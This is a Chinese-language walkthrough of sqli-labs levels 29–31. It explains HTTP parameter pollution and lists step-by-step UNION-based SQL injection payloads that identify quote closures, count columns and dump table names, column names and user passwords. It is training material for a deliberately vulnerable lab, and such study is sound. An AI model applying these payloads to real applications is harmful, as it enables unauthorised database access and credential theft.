目錄
前言
less29(單引號http參數污染)
less30(雙引號http參數污染)
less31(雙引號括號http參數污染)
前言
在JSP中,使用request.getParameter("id")
獲取請求參數時,如果存在多個同名參數,它會返回第一個參數的值。這是因為request.getParameter()
方法的設計是返回第一個匹配的參數值。
在PHP中,使用$_GET["id"]
獲取請求參數時,如果存在多個同名參數,它會返回最后一個參數的值。這是因為PHP的$_GET
超全局數組會覆蓋前面的同名參數值。
比如:
?id=2&id=1返回的是id=1的請求:
less29(單引號http參數污染)
這一關如果直接union查詢注入,就是很基礎的sql注入。其實這里考查的是http參數污染注入。
?id=2&id=1'報錯——判斷為單引號閉合
?id=2&id=1'--+正常回顯——確定為單引號閉合
?id=2&id=1' order by 3--+——判斷有三處回顯
?id=2&id=' union select 1,2,3--+——判斷出回顯位置
?id=2&id=' union select 1,user(),database()--+——爆數據庫和數據庫用戶:
?id=2&id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=2&id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=2&id=' union select 1,2,group_concat(id) from security.users--+—— 爆數據
less30(雙引號http參數污染)
?id=a&id=1'正常回顯
?id=a&id=1"無回顯——判斷為雙引號閉合
?id=a&id=1"--+——正常回顯,確定為雙引號閉合
?id=a&id=1" order by 3--+——判斷有三處回顯位
?id=a&id=" union select 1,2,3--+——找到回顯位置
?id=a&id=" union select 1,2,database()--+——爆數據庫
?id=a&id=" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=a&id=" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=a&id=" union select 1,2,group_concat(username,password) from security.users--+——爆數據
less31(雙引號括號http參數污染)
?id=0&id=2正常回顯,?id=0&id=2'正常回顯
?id=0&id=2"報錯——判斷為雙引號閉合
?id=0&id=2"--+又報錯
?id=0&id=2")--+正常回顯——判斷為雙引號括號閉合:
?id=0&id=2") order by 3--+——判斷有三處回顯
?id=0&id=") union select 1,2,3--+——找到回顯位置
?id=0&id=") union select 1,2,database()--+——爆數據庫
?id=0&id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=0&id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=0&id=") union select 1,2,group_concat(id,password) from security.users--+——爆數據